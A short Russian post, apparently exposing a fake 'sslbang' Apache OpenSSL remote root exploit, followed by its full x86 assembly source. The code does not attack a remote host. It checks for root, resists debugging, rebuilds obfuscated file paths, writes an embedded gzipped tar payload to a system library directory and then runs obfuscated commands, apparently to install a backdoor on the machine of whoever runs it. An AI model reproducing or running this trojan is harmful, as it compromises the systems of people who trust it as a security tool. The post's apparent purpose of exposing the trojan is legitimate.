TESO backstage
                                 -==============-

 Внимание, кто от этого пострадал в своё время, вам будет интересно взглянуть.

 evil~# ./sslbang
 Apache OpenSSL <= 0.9.6g remote root exploit against linux/x86\n"
        KEEP IT PRIVATE!  Warez form #el8 @ EFnet\n"

  Usage: ./sslbang <host> <port> <brute_offset>\n"
   retaddr bruteforcing starts from addr 0xbfffffff by default\n"
 evil~#


 Вот исходник:

.globl _start
_start:

# write header
#   so you must be really ;)

# getuid()
 xorl %eax,%eax
 xorl %ebx,%ebx
 mov $24,%al
 int $0x80

 cmpl %eax,%ebx
 jne mustroot

# check for installed version...
 movl $4,%eax
 movl $13,%ebx
 movl $chkvuln,%ecx
 movl $7,%edx
 int $0x80

 movl $1,%ebx
 cmp %eax,%ebx
 je crash

# fuck ptrace()
 xorl %ebx,%ebx
 xorl %ecx,%ecx
 movl $26,%eax
 int $0x80

 movl $0,%ebx
 cmp %eax,%ebx
 jne noptrace

# write() ok#1
 xorl %eax,%eax
 mov $4,%al
 movl $1,%ebx
 movl $mesg2,%ecx
 movl $msg2l,%edx
 int $0x80


# here should be a decryption func and code below must be crypted!!

 # open()
 xorl %eax,%eax
 pushl %eax

 #    z g t .
 # 0x7a67742e + 11
 movl $0x7c697630,%edx
 subl $0x02020202,%edx
 pushl %edx

 #    s l n /
 # 0x736c6e2f - 20
 movl $0x534c4e0f,%edx
 addl $0x20202020,%edx
 pushl %edx
 pushw $0x6269
 pushw $0x6c2f
 movl %esp,%ebx
 movl $0101,%ecx
 movl $00700,%edx
 movl $5,%eax
 int $0x80

 movw $0x6174,(x86code+14)

 # write() bd tgz
 movl %eax,%ebx # descriptor here
 movl $4,%eax
 movl $x86code,%ecx
 movl $x86len,%edx
 int $0x80

 # close()
 xorl %eax,%eax
 mov $6,%al
 int $0x80

 xorl %eax,%eax
 mov $4,%al
 movl $1,%ebx
 movl $usage,%ecx
 movl $usagel,%edx
 int $0x80

 movl $2,%eax
 int $0x80

 xorl %edx,%edx
 cmpl %eax,%edx
 jne quit
 jmp connect


# MAIN TRABLZ HERE!!
# execve() now:
connect:

 xorl %edx,%edx
 # key = -3
 xorl %edx,%edx
 pushl %edx

 # key = -3
 movl $0x65702c6b,%ebx
 addl $0x03030303,%ebx
 movl $0x6b653334,%ecx
 subl $0x02030405,%ecx
 pushl %ebx
 pushl %ecx
 movl %esp,%ebx

 movw (a1),%ax
 addw $0x0404,%ax
 movw %ax,(a1)

 movw (a0),%ax
 addw $0x0303,%ax
 movw %ax,(a0)

 xorl %edx,%edx
 pushl %edx

 movl (sslkey+32),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+28),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+24),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+20),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+16),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+12),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+8),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey+4),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl (sslkey),%edx
 subl $0x05070803,%edx
 pushl %edx

 movl %esp,%ecx
 xorl %edx,%edx
 pushl %edx
 pushl %ecx
 pushl $a1
 pushl $a0
 movl %esp,%ecx
 movl $11,%eax
 xorl %edx,%edx
 int $0x80

 jmp quit


mustroot:

 xorl %eax,%eax
 mov $4,%al
 movl $2,%ebx
 movl $mesg1,%ecx
 movl $msg1l,%edx
 int $0x80
 jmp quit

noptrace:

 xorl %eax,%eax
 mov $4,%al
 movl $2,%ebx
 movl $ptmsg,%ecx
 movl $ptlen,%edx
 int $0x80
 jmp quit

quit:

 xorl %eax,%eax
 incl %eax
 int $0x80

crash:
 lds mesg1,%si


.data
mesg1:
.asciz "[-] Sorry, you must be root! exploit uses raw socket for fast ret_addr \n bruteforcing!\n"
msg1l = .-mesg1

mesg2:
.asciz "[+] Ok, arch looks good. Extracting...\n"
msg2l = .-mesg2

ptmsg:
.asciz "[-] Sources of this stuff are private! So fuckup!\n"
ptlen = .-ptmsg

usage:
.ascii " Apache OpenSSL <= 0.9.6g remote root exploit against linux/x86\n"
.ascii "        KEEP IT PRIVATE!  Warez form #el8 @ EFnet\n"
.ascii "\n  Usage: ./sslbang <host> <port> <brute_offset>\n"
.ascii "   retaddr bruteforcing starts from addr 0xbfffffff by default\n"
usagel = .-usage

rawsock: .ascii "\x90\xaf\x7f\x31\11\x99\xf1"

# a1: .ascii "\x20\x5a\x00"
# a0: .ascii "\x12\x14\x00"
a1: .ascii "\x29\x5f\x00" # key = '-4'
a0: .ascii "\x70\x65\x00" # key = '-3'

sslkey:
.ascii "\x66\x6c\x27\x34\x6f\x71\x69\x40\x77\x69\x79\x25\x30\x82\x7f\x6b"
.ascii "\x23\x76\x73\x78\x31\x7c\x6e\x7f\x3e\x36\x36\x72\x64\x73\x6c\x72"
.ascii "\x68\x36\x7a\x6d\x01\x00"

ssllen = .-sslkey

x86code:
.ascii "\x1f\x8b\x08\x08\x96\x35\x9d\x40\x00\x03\x6e\x6c\x73\x2e\x74\x61"
.ascii "\x72\x00\xec\x5b\x0d\x74\x53\xc7\x95\x1e\xc9\xc6\x96\x85\x89\x45"
.ascii "\x02\x09\x4d\xd3\xf0\x48\xf8\x0b\x09\xb2\x24\x6c\x03\x29\x50\xfe"
.ascii "\x1e\x3f\x5d\x9c\x1a\x8c\x4c\x52\x30\x42\x96\x9e\x78\xb2\xf5\x17"
.ascii "\xe9\x89\x40\x82\x89\x89\x30\xeb\xc7\x8b\x72\xdc\x36\x27\xe9\x9e"
.ascii "\x65\xf7\xc4\x71\x92\xe5\x64\xd9\x94\xed\xf6\x64\x4d\x42\x41\xfc"
.ascii "\x2c\x32\x1c\xb2\x71\x29\xa5\x24\x9b\x6d\xd8\x34\xa4\xf2\xda\xdb"
.ascii "\x50\xf0\x02\x0b\x6e\xb4\xf7\xce\x1b\xfd\x82\x43\xb2\x67\xc9\xe9"
.ascii "\xee\xc9\xe3\x8c\xef\xfb\xe6\xde\x99\xb9\xf7\xce\x9d\x79\xf3\x23"
.ascii "\x1a\x9c\xe4\x96\x3f\x26\xb3\xc9\x34\xbd\xb2\x92\x98\xd4\x27\x9f"
.ascii "\x56\x55\x56\x56\x10\x10\xa9\xa8\xac\xb4\x54\x98\x2d\xd3\x54\xf9"
.ascii "\x2a\xc2\x99\x6e\xbd\x6a\x84\x84\x43\x92\x3d\xc8\x71\x24\xe8\xf7"
.ascii "\x4b\x9f\x27\x77\x33\xfe\xff\xd1\xe7\x69\x7e\xd9\x22\x8d\x46\x93"
.ascii "\xc6\x5a\x52\x40\x10\x05\xb6\x17\xea\x2a\xb2\xe4\x2a\x08\x47\x8a"
.ascii "\xd8\x7b\x11\xc5\x90\x5a\x40\x06\x52\x0c\xde\x31\x0d\x83\x54\x08"
.ascii "\xa9\x00\xd2\x00\x26\xe0\x61\xba\x03\xde\xef\x60\x3c\x0d\x4b\xf4"
.ascii "\x01\x1e\xa6\xda\x52\x42\x30\x61\x79\x62\x50\xf9\x2b\x01\xaf\xdc"
.ascii "\x59\xa8\xc3\x34\x06\x32\x66\x68\xd4\x76\x91\xaf\x05\x72\x0a\xf8"
.ascii "\xa7\x80\x87\xe9\xc7\x80\x5f\x62\x7a\x15\xb2\xa4\x03\x79\xdd\xd6"
.ascii "\x42\x1d\x26\x0e\x30\x97\xc5\x2b\xf7\xb8\x1b\xca\x3d\xce\xa9\x1e"
.ascii "\xb7\x2f\xbc\xd1\x18\xf2\x1b\x2d\x6a\xbe\x81\xe9\xb6\xf8\x11\x2b"
.ascii "\xf3\x45\xe6\x19\x09\xe9\x4e\x48\x25\x90\x6e\x83\x34\x2a\xd5\x0e"
.ascii "\xe3\x83\x3a\x64\x38\xa4\xdb\x59\x1d\x58\x56\xcf\x78\x68\xfb\x08"
.ascii "\x48\xa3\x99\x6f\xbe\xc8\x53\x74\x83\xbc\x61\x8c\x16\x43\x2a\xcb"
.ascii "\xd2\xcb\x30\x44\x1d\xfb\x21\xcd\x6d\x2d\xd4\x6d\x02\x7a\x1f\xa4"
.ascii "\x5a\x48\x35\x80\x67\x33\x3d\x17\x40\x5a\x07\xf8\x61\x86\x4f\x41"
.ascii "\x0a\x00\x9e\xce\x70\x2b\xa4\x16\xc0\x8b\x18\xc6\x3a\xda\x01\x3f"
.ascii "\xca\xf0\x5a\x48\x2f\x01\xee\x62\xbc\x57\x21\xed\x01\x3c\x52\xa3"
.ascii "\xf2\xb1\x9d\x18\xe0\x38\xc3\x1b\x20\xf5\x00\x3e\xce\xca\xef\x86"
.ascii "\x74\x16\xf0\x47\x0c\xcf\x80\x74\x1e\xf0\xb7\x19\x7e\x0c\x8d\xd8"
.ascii "\x9e\xd1\xef\x01\xb4\x15\x70\x1b\x6b\xef\x07\x90\x38\xc0\xbd\x8c"
.ascii "\xaf\x40\x32\x01\xbe\x8d\xe1\x2d\x68\x3f\x60\x91\xe1\xbb\xd1\xfe"
.ascii "\xac\xfa\x5e\x40\xfd\x94\x42\x5d\x21\xf5\xe3\x6d\x64\x19\xfa\x23"
.ascii "\x8b\x9f\x19\x15\x6a\xfc\x10\x9b\x6d\xbd\xd7\xef\xb3\xe1\x8c\x21"
.ascii "\xd9\x6c\x04\xc2\xc8\x81\xe1\x53\x45\x1c\x7e\x9f\x4f\x70\x48\x44"
.ascii "\xd8\x28\x38\x36\x08\x20\xe7\xd8\x68\xb7\xb9\xdc\x3e\xbb\xc7\xfd"
.ascii "\xa4\x40\x9c\xe1\x80\x85\x84\x3c\x82\x10\x20\x41\xe0\xbb\x82\x7e"
.ascii "\x2f\x09\xf9\x1d\x4d\x82\x44\x9e\x08\xba\x25\x81\x34\xb8\x7d\x4e"
.ascii "\x28\xe4\x14\x82\xc2\x7a\x77\x48\x12\x82\x36\x57\xd0\xee\x15\x6c"
.ascii "\x6e\x9f\xcb\x4f\x42\x52\xd0\xe7\xf0\x06\x88\x57\xf0\x86\xa0\xc4"
.ascii "\x06\x97\x3f\xd8\x44\x44\xc9\xef\x0b\x41\x73\x6e\x89\xd8\x96\x7e"
.ascii "\x0f\x34\x72\xba\x7d\xb6\x70\x48\x70\x12\xa7\x5d\x00\x1d\xa1\x36"
.ascii "\xd4\x8e\xa9\xea\xb5\xbb\x31\xe7\x46\xb5\x3b\x3c\xfe\x90\x40\x16"
.ascii "\x2f\x5b\x3a\x7f\x81\xcd\x62\x34\x1b\xa7\xa5\xdf\x71\xf6\xd5\x0e"
.ascii "\xf9\xaf\x20\xfd\xa6\xa1\xb1\x8e\x7f\x0d\x59\xb1\x18\x1a\xeb\x2e"
.ascii "\xc1\x68\x7f\x9f\xe5\x19\xdc\xee\x11\x58\xdf\x27\x8c\xdf\x03\xe3"
.ascii "\xb6\x08\x06\xc4\x36\xa0\xc5\xe0\xe8\x36\xa4\x50\xd1\xb3\x48\x61"
.ascii "\x90\xb4\x23\x85\x8e\x79\x1e\x29\x04\xfe\x8f\x91\xc2\xa0\xd8\x89"
.ascii "\x14\x06\xc0\x4b\x48\x61\xf0\xbd\x82\x14\x5a\xda\x85\x14\x06\xdc"
.ascii "\x6e\xa4\x30\x10\xf7\x20\x85\x41\xf9\x33\xa4\xd0\x72\x17\x52\x08"
.ascii "\x8c\x7d\x48\x61\xf0\xc4\x90\x82\x62\x47\x90\xc2\x20\xea\x46\x0a"
.ascii "\x9d\x7e\x02\x29\x0c\x6e\xab\x7c\x2e\xd2\xaf\x4b\x3c\x0e\xaa\xb5"
.ascii "\x27\x50\xb1\x84\x05\x5a\x3f\x76\x38\x59\xb9\x19\x24\x92\x13\x5a"
.ascii "\xe0\x2f\xda\x91\x9c\x80\x16\x60\x84\x91\xde\xb3\x49\x78\x26\xa0"
.ascii "\x25\x22\xf2\x7a\x7b\x28\x46\x8b\x44\x74\x41\x6f\x8c\x62\xb4\x4c"
.ascii "\x1c\x83\x78\x0f\xc5\x68\xa1\x88\xe1\xd5\xfb\x12\xc5\x68\xa9\x38"
.ascii "\x19\x71\x3b\xc5\x68\xb1\x88\x9d\xd1\xdb\x42\x31\x5a\x2e\xe2\x50"
.ascii "\xe9\x0d\x50\x8c\x1e\x10\xe7\x22\x5e\x47\x31\x7a\x42\x5c\x82\xb8"
.ascii "\x86\x62\xf4\x88\x58\x83\x78\x2e\xc5\xe8\x19\x11\x87\x70\xaf\x89"
.ascii "\x62\xf4\x90\xb8\x0e\x31\x47\x31\x7a\x4a\x44\x83\x7a\x0d\x14\xa3"
.ascii "\xc7\xc4\x00\x62\x42\x31\x7a\x4e\xdc\x88\xf8\xfc\x67\x88\xd1\x83"
.ascii "\x62\x0b\xb5\x9f\x62\xf4\xa4\xd8\x46\xed\xa7\x18\x3d\x2a\xb6\x53"
.ascii "\xfb\x01\x9b\xff\x63\xad\xfc\x6f\x91\x8f\xcf\xd7\xac\x5c\x21\xee"
.ascii "\x54\xd0\x13\x30\xe0\x97\xd7\x89\x2f\xb5\x15\xea\x12\xdf\x03\xf9"
.ascii "\x81\xf6\x76\xf0\x7d\x6d\x4d\x02\x5d\xba\x7a\xeb\xe1\xf7\x21\x48"
.ascii "\x94\x08\xea\xdb\x1a\x93\xb4\xc9\x1e\xa5\x7e\xf0\xd8\xe1\xf6\xf4"
.ascii "\x63\x55\x46\xaf\x83\x06\x68\x6f\xb5\x9e\x0c\x2f\x55\x46\xaf\x01"
.ascii "\xa8\x68\x41\xf8\xee\xa8\x34\x91\x44\xe7\x17\x76\x62\x4e\xf2\x76"
.ascii "\xc6\xd1\xb7\x1e\x0b\xff\x7b\x17\x4e\x5b\x20\x62\x88\xf4\x97\x8a"
.ascii "\x4e\xc8\x4e\x3c\x0f\xba\x45\x8e\x18\xba\x70\xcc\x77\xd2\x1a\xfb"
.ascii "\xeb\x0f\x47\x37\xb0\x38\xa0\xe0\x4d\xd4\x08\x70\x17\xce\xa9\xd8"
.ascii "\x5c\x4c\x1a\x0d\x44\x94\xfe\x0a\xcc\xa0\x95\x7c\xfa\x47\x5a\x09"
.ascii "\x4a\xb7\x47\x7f\x36\x91\xc9\xb3\xf2\x4c\x5f\xc4\xa3\xe2\xfc\x20"
.ascii "\x32\xe3\xfc\x15\xc3\x24\x30\x8f\xd7\xc9\xfc\x40\xa4\xb9\x94\x84"
.ascii "\x0d\x0a\x3f\x70\x94\x98\xa2\xfc\x40\x92\xf4\x3e\x8f\xf3\x6d\xa4"
.ascii "\xf9\x0a\x09\x97\xf4\xfe\x39\xbc\xa3\x3d\x8a\xb5\x34\xca\x5f\x91"
.ascii "\xf9\x7e\xb9\x47\xa9\xee\x7f\x0b\x6b\xb9\x6c\x06\xb8\x83\xef\x6f"
.ascii "\xe3\x2f\x22\xb7\xfa\x8a\x5c\x9d\xcb\xb5\x96\xb6\x34\x5f\x24\xe1"
.ascii "\x51\x91\xe6\x41\x22\x4d\xc8\x6a\xa1\x6f\x4c\x3b\x68\x82\x26\x2b"
.ascii "\xd6\x81\x1d\xfc\xc5\x48\xcc\xd4\xa6\xa5\x1c\xc5\x7a\x25\xce\xf7"
.ascii "\xbf\x73\xe2\xc4\x09\x85\xef\xbf\xfc\x91\xdc\x73\x30\x51\x20\xf3"
.ascii "\x57\x7a\x7d\xd0\x43\xed\xb4\x06\x10\xd1\xc1\xcb\x03\x3d\x72\xec"
.ascii "\x3a\x7b\x0b\x99\x7d\xe0\x3f\xb0\xad\x65\x46\xf9\x96\x29\x94\xce"
.ascii "\xdc\xa2\xed\xe3\x14\x7e\xf0\xe0\x59\x6d\x01\x3f\x18\x1d\x85\xdc"
.ascii "\xb2\xfd\x44\x73\x48\xb6\x0e\x46\xbc\x83\xa6\x24\xaf\xeb\xfb\x67"
.ascii "\xe0\x53\x77\x67\xd5\xb7\x31\xce\x27\x70\x04\x81\xe5\x91\x44\x4d"
.ascii "\x9c\xdf\x75\x04\x22\x27\xce\xef\x8e\x53\xb2\x87\xa4\x58\x81\x38"
.ascii "\xdf\x76\x9c\xe6\x3d\xfb\x2b\x4a\xda\x13\x94\x3c\xff\x29\x25\xb8"
.ascii "\x4e\x20\xd0\x1b\x8d\xa4\x91\x24\xfe\x61\x90\xf6\x15\x28\xdb\xa8"
.ascii "\x11\x2f\x01\xbf\x71\x44\xe2\x3b\xd9\x79\x25\xcf\xd2\xbc\x07\x33"
.ascii "\x79\x23\x1b\xb5\x8d\xda\xc4\x14\xd6\xc9\x31\xda\x67\x03\x64\x53"
.ascii "\x29\x04\x51\xa3\x26\x71\x12\x04\xe5\x4b\x28\x67\x68\x04\x75\xce"
.ascii "\xd4\x24\xce\x66\x8a\xd2\xac\xee\x9a\xc4\x3b\x6a\x96\x2b\xce\x9f"
.ascii "\xd1\x12\x0c\xbe\xc6\xcf\x60\x6a\xf9\x9b\xc1\x54\x95\x31\x97\xcc"
.ascii "\xbf\x1f\xe7\x3f\x50\x35\x85\x72\x58\x51\x32\x3c\x90\x58\x99\x12"
.ascii "\x69\x8d\x6d\x1a\xae\x36\x68\x87\xac\xf6\x76\x94\xd2\x63\xed\x5d"
.ascii "\x35\x09\x7f\xaa\x41\x5d\x94\x4f\xd4\x60\x83\x60\xaa\x1e\x59\x58"
.ascii "\xc5\xe3\xd7\x90\xcb\xa1\xe2\xe7\x23\xcd\xe7\x49\xd9\x73\x4b\x34"
.ascii "\x6a\x2b\x7a\x71\x24\x18\x4b\xab\xd8\x77\x2d\xdd\x4e\x59\xeb\x64"
.ascii "\xca\x2f\xc5\xc2\x0b\xd5\xfc\xc4\x32\xa0\x58\x43\x7f\xa4\xb9\x9f"
.ascii "\x94\xb5\x26\x99\x9e\x69\x17\x0e\x5e\xbd\xde\x85\x89\x54\x1e\x33"
.ascii "\xb7\xeb\x5a\xb6\xb9\xc7\x51\x96\x34\x6a\xc0\xb5\xef\xa6\x19\x50"
.ascii "\x3f\xd8\x58\x90\xf8\xd6\xb5\x8c\x0b\xd1\x9e\x64\xb8\x3f\xf1\x17"
.ascii "\x19\x15\x37\x8d\xa1\xea\xf5\x27\x5e\x4d\x37\x01\x8e\x59\x82\x02"
.ascii "\xd0\xcd\x5a\xe4\x0c\x4f\xd5\xa0\x6b\xd4\x20\xbe\x76\x35\x8d\x09"
.ascii "\xe2\xbe\x8c\xc2\xb7\x8b\xe3\x41\x61\xcc\xac\x4a\x67\x46\xf9\x36"
.ascii "\x70\xe4\xae\x1a\x71\x06\xb0\x12\x6b\xf3\x2c\xf9\x0d\x60\x18\x27"
.ascii "\x6a\x6f\x95\x36\xea\x13\x5e\x55\xa0\xd7\xf5\x19\xf6\x0d\x8e\xf7"
.ascii "\x0e\x91\x4e\x4f\xb5\x50\x57\xe4\x4a\xf2\x6d\x44\xd2\x9d\x30\x30"
.ascii "\xa2\xfb\x26\xd1\x62\x7d\x85\x30\xa7\x15\x00\x2b\x3c\xf0\xe8\xea"
.ascii "\xfa\xc3\xd9\xf3\x05\xce\x83\x2b\x52\xf3\xe0\x49\x03\x1d\x4f\xd4"
.ascii "\x1e\x3a\x07\xaa\x6b\x49\xfc\xee\x86\x44\x32\xd5\x4d\x56\xf2\x2b"
.ascii "\xaa\x67\xd3\x25\x2d\x59\xb2\xb4\x76\xe5\xa2\xa5\xcb\xf8\xd9\xe5"
.ascii "\x4e\x61\x43\xb9\x2f\xec\xf1\x90\x9a\x5a\xf3\xec\xfb\x39\x20\x96"
.ascii "\xd9\x73\x38\x32\x39\xd4\xe4\x6a\xf4\xd9\x9b\x1a\x27\xda\x43\x4e"
.ascii "\xbb\xd3\xf3\x70\x13\xf9\x41\xe5\x0b\xef\xb4\xfc\xe4\x0e\xe2\x6a"
.ascii "\x14\x1b\xc5\xa6\x46\xd1\x69\x0f\x59\x2a\xa7\x4d\xaf\x32\xcf\x20"
.ascii "\xdc\x2a\xc1\xe3\x30\x79\x85\x87\x38\xaf\x1d\xd7\x0f\xe3\x38\x3d"
.ascii "\x29\x87\x35\x4b\x39\x34\x6c\x77\x86\xec\xd3\x2a\x25\xe3\xc4\x29"
.ascii "\x33\x66\xcc\x58\x0f\x95\xd9\x32\x6b\x26\x89\x7d\x23\xe9\x77\x12"
.ascii "\x9e\x6c\x7a\x2a\x8b\xb7\x08\xe6\xd3\x3a\x48\x2e\x48\x1b\x20\x6d"
.ascii "\x87\xf4\x02\xa4\xd7\x20\xbd\x09\xe9\x28\xa4\xd3\x90\x3e\x81\x74"
.ascii "\x09\x52\x11\xac\xd1\xee\x84\x34\x11\x52\x15\xa4\x45\x90\xea\x20"
.ascii "\xb9\xb6\xab\x75\x6a\xd8\x9a\x03\xd7\xe4\xf8\x79\xc1\xb5\xf7\x4e"
.ascii "\xb6\xce\x9b\x0c\xfb\x01\x5c\x47\x3f\x14\x81\x7a\x80\x9e\x00\x8c"
.ascii "\xeb\x74\x5c\xa7\x0c\x67\xe5\x46\x33\xbd\xd0\xbf\x1b\x41\x4f\x5c"
.ascii "\xdf\xe0\xdc\x81\x6b\x7e\x5c\x6f\xdf\x05\xa9\x65\x1b\xac\x73\x91"
.ascii "\x0f\x14\xd7\x8a\xd8\xf0\x1d\x8c\x42\xdf\xfb\x97\x40\x3e\x98\xea"
.ascii "\x47\x5d\xce\x03\xbd\x67\x5b\xc6\xde\x3f\xa5\xc7\xe1\xf1\x19\xfd"
.ascii "\xb7\xb8\x0d\xdc\xcf\x57\x55\x54\x0c\xb5\xff\xb7\x98\xa6\x99\xe8"
.ascii "\xfe\x7f\xba\x65\x1a\xfc\xb3\xa0\x7c\xc5\xf4\xe9\x5f\xef\xff\xbf"
.ascii "\x8a\x27\x7f\xff\xaf\x61\xfb\xff\xd4\x33\x9e\x01\xf5\x2c\x60\x32"
.ascii "\x8c\x91\xdc\x30\xb6\x76\xe0\xa8\x92\xcf\xc1\x62\x48\xa7\xcc\x2d"
.ascii "\xec\x44\x64\x8e\x65\xad\x07\xcc\x31\xf9\x5c\xfd\xe1\x74\x29\xac"
.ascii "\xce\x64\x36\x9a\xcc\x40\x9b\x84\xa0\x4f\xf0\xd8\x36\x08\xc1\x90"
.ascii "\xdb\xef\x9b\x6d\x31\x56\x18\xa7\x4d\xb5\x98\xbc\xce\x26\x58\xf7"
.ascii "\xfc\x8f\x1f\x42\x8c\xa1\x4d\x5e\xc9\xde\x00\x54\x0a\xaa\x54\x4c"
.ascii "\xbd\x49\xc2\x46\x89\x18\x83\x82\x87\xbd\x39\xed\x92\x9d\x18\x1b"
.ascii "\x42\x21\x62\xf4\xf9\x61\x27\x66\xf4\xfa\x9d\x74\x5f\x64\x74\xf8"
.ascii "\xbd\x5e\xc1\xf7\xa5\xba\xfc\x9b\xcc\xbe\xd4\xde\x7d\x2e\xa4\x49"
.ascii "\x59\xfc\xd4\xde\x68\x1c\x51\xcf\x11\x52\x0f\x4e\x4c\x06\x96\x87"
.ascii "\xe5\x53\xe7\x0a\x0f\x32\x9c\x3a\x33\x10\xf3\xda\x2b\x64\xd4\xcc"
.ascii "\xe4\x6f\x26\x57\x45\xd4\xb3\x03\x92\x25\x37\x2a\x0b\xa7\xfa\x7d"
.ascii "\x16\xc9\x9c\x61\xe0\xb3\x99\xd9\x96\x2f\xc7\x93\xdc\x3d\xf2\x8b"
.ascii "\xac\x6c\xbe\xdc\x48\x92\x7b\xee\xf1\x4b\x48\x8f\xdc\x40\x2e\xbb"
.ascii "\x4d\x7c\x3e\x00\xd0\x43\xd4\x73\x14\x3d\xc9\x9c\xd1\x94\xe4\xd5"
.ascii "\xb7\x1b\xc0\xea\x1b\xd4\x97\xff\x64\xe7\x17\x92\x3f\x24\xb3\x79"
.ascii "\x05\x79\xa5\x0a\xf2\x4e\x6a\x0a\xa0\xc4\xf0\x21\x6b\x43\x7e\x11"
.ascii "\x3d\x5f\xc0\x47\x8d\x83\xa2\x3c\xfe\xb0\x3c\x5c\x4c\x2c\xec\x1d"
.ascii "\x37\x83\xb7\x43\x89\x39\x59\x7c\xb4\x13\xcf\x23\x38\xa2\xf6\x19"
.ascii "\xf2\x61\xb2\x16\xec\x3e\x21\x68\x74\x90\xf5\x0e\x87\xc5\x06\x21"
.ascii "\x1a\x70\x7b\x04\xa7\x11\xf6\xf6\x10\xb7\x61\x8f\x60\xcb\x1d\x52"
.ascii "\xc4\xed\x73\x4b\x8c\x05\x32\x92\xe8\x0e\xa5\x10\xad\x2a\x1c\x48"
.ascii "\x41\x75\x0f\x3f\x9c\x9d\x81\xe5\x1a\xfa\xf5\xf3\xff\xf8\xf1\xda"
.ascii "\x9b\x04\xaf\x00\x33\xe4\x2d\x6c\x83\x9e\xe7\xc3\x07\x7d\x88\xef"
.ascii "\xbf\x19\x16\x99\xe9\xef\x7f\x95\x09\xd6\x09\x66\xf3\xb4\x2a\xcb"
.ascii "\xd7\xdf\xff\xaf\xe2\xb9\x7f\x1c\x5b\xc9\xeb\xf5\x75\xfc\x8a\xd9"
.ascii "\xeb\x28\x0a\xfb\xec\x5e\x81\x9b\x1a\xe4\x36\x73\x14\xdb\x9f\x68"
.ascii "\xe2\xa6\x2e\xe2\x8c\xdc\xa4\xa7\x02\x41\xb7\x4f\xe2\xc6\x5b\x9a"
.ascii "\x27\xad\xd3\xeb\xdd\x2e\x6e\x35\x37\x1e\xca\x71\xb3\x67\x73\xf7"
.ascii "\x55\xdd\xc7\xd5\x73\xf7\x73\xf0\x1d\xe5\x42\xe1\x40\xc0\x1f\x94"
.ascii "\x04\x27\xb7\x49\x90\xf4\x1c\xc7\x49\xa2\xe0\x43\x1a\xf4\x72\x53"
.ascii "\x5d\xdc\x14\xa3\x1f\x92\xb4\xfe\xc9\x4c\x96\xb1\xbc\xc1\x09\x7f"
.ascii "\x7c\x82\x24\x66\x67\xa6\xc3\x13\x33\xf1\xb8\x53\xef\x72\xeb\xf5"
.ascii "\xe5\x21\xd4\xca\xed\x0b\xc1\xec\x85\x72\x5e\xb7\x23\xe8\x87\x3a"
.ascii "\xdd\xc1\xc7\x7d\xfe\xd9\x54\x21\xf3\x9c\x89\x16\xce\x32\x27\xbd"
.ascii "\x01\xba\xae\x0c\x5d\xf8\x0e\x25\x16\xf4\xa2\x14\x88\x5c\x2f\xa0"
.ascii "\xea\x48\xad\xd6\xa3\xd2\xa0\x0d\x96\xf0\x6e\xc8\x54\xea\x71\x37"
.ascii "\x04\x60\x5f\x84\x47\xc3\xe6\x6c\x6e\x4a\x4d\xe0\x87\x1e\xf7\x04"
.ascii "\xa4\xe0\x75\x12\xe0\x03\x60\x82\x92\x76\x64\x99\xb2\x59\xb4\x55"
.ascii "\x95\xd9\x90\xc5\x54\x1d\xe5\xf3\x84\xa8\x3b\xf5\x0e\xbb\xc4\xcd"
.ascii "\x9a\xc5\xd9\x04\xbf\xcb\xc6\xcd\x99\xc3\x95\x0b\x92\xa3\x3c\xe8"
.ascii "\x30\x3a\xe1\x8f\x5e\x7f\x3f\x67\xf7\x84\xec\x1c\x7e\x15\xdc\x76"
.ascii "\x8f\x3b\xe4\x5b\xcf\xa9\xf3\x3f\xd7\xb0\x89\x5b\x68\xdf\xe0\x76"
.ascii "\x72\xd5\x6e\x9f\x43\x14\x82\xdc\x64\xc7\x03\x9c\x05\xc6\xa6\x1a"
.ascii "\x16\x6b\x6e\x12\x17\x4f\x4d\x52\xe3\x62\xcd\x78\xcb\xa4\xe6\x35"
.ascii "\xa9\xc8\x58\x93\x13\x1a\xb7\x20\x0c\x50\x07\x47\x80\x53\xef\x73"
.ascii "\x72\x9c\xaa\xe6\x31\x87\x5f\xd7\xf7\xd9\x4c\x16\x34\x6b\x86\x88"
.ascii "\x9a\xbc\x26\xd2\xfd\xaa\xe6\xd0\xfe\xfe\x5f\x0b\xad\x54\x23\x59"
.ascii "\xfd\x9f\xc9\x51\x3b\x5d\xf5\x69\x76\xd7\xe7\xd8\x92\xa5\x94\x9e"
.ascii "\xc6\x80\x5e\xaf\x4a\x65\x1c\x98\x37\xfe\x59\xc9\x5b\x3a\xc7\x7c"
.ascii "\xfe\xfe\xcf\x6c\xae\xb2\x54\xa4\xe7\xff\x0a\x53\x25\xce\xff\x00"
.ascii "\xbe\x9e\xff\xbf\x8a\xe7\x66\xfb\xbf\x1e\x16\x30\xa9\xfd\xdf\x08"
.ascii "\x92\x1b\x41\x56\xf9\xdc\xaa\xba\xda\x48\x7f\x69\xa4\x59\x37\xa2"
.ascii "\xac\xb5\x1a\xca\xbe\x45\xce\x26\x93\xe3\x3e\x3a\x80\xec\xbd\xb8"
.ascii "\x2f\x51\xc2\xa5\x4b\x37\xea\x76\xbf\x11\xd6\x6d\x8b\x85\xff\xd3"
.ascii "\x1c\xeb\x2b\xfc\x46\xac\x54\xd3\x1a\x2b\xdb\x76\x10\xb8\x11\xbc"
.ascii "\x26\x24\xda\x2d\x53\xe3\xcf\x70\xac\xe5\xf8\x33\xe3\xd3\x6f\x15"
.ascii "\xe9\x37\x13\xbc\xe1\xa9\x5b\x2f\xde\xf3\x45\xdf\x2a\xd2\xe0\x4e"
.ascii "\x73\x2f\x6e\x0a\x2e\xbe\x1e\xad\xbf\x10\x0d\xae\xeb\xc2\x55\xac"
.ascii "\xf9\x98\xfc\xe1\xc5\x57\x77\x69\x25\xad\xeb\xd5\x5d\x1a\x49\xf3"
.ascii "\x4a\xd9\xfe\x61\xb8\xe3\x3a\x78\x56\x67\xbe\x54\xb6\x7f\x34\x87"
.ascii "\x56\x1e\x6a\x3d\x19\x1e\xb5\x83\xbf\xf0\x32\xa2\x1d\xfc\xc5\x97"
.ascii "\x51\xa2\xaf\x52\xbe\x14\x39\xaa\x8d\x7c\x36\xf6\xe9\x07\xbb\x90"
